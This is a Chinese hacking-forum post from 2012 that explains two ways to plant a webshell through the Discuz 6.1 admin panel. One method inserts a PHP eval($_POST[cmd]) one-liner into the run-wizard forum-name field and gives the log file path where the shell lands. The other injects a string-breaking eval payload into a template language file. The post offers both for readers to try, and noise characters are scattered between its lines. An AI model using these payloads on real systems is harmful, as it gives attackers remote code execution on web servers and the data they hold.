中国网络渗透测试联盟
标题:
discuz6.1后台拿shell方法
[打印本页]
作者:
admin
时间:
2012-9-13 16:59
标题:
discuz6.1后台拿shell方法
discuz6.1两种方法后台拿shell
) O# d- C# M- f& _3 d
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
$ E- U, l! W) {
1:
6 @# q' s7 g- x" ^) E
http://127.0.0.1/discuz/admincp. ... zard&frames=yes
/ U% T" Q' T2 p; c) V
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
: ]4 |3 {, q5 w+ W" |* T( h7 Z
<?php eval($_POST[cmd]);?>
: L/ X+ j) a8 W
后台webshell地址:
http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
' K" G" V! ]2 p( d
9 l1 i! b! D5 k9 @9 j6 a( \
6 e* H) ]3 N }0 M
2:后台模板管理--默认模板套系--详情
$ L# n4 r3 B: W! p t' b" d
templates/default/actions.lang.php
' W8 L5 n2 F6 _( v, f
jhackj\\');eval($_POST[cmd])?>;//
6 @0 y3 m# u$ ]+ }; N
( h7 D; e6 @; [8 V
利用很简单,聪明的人一看就懂了
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2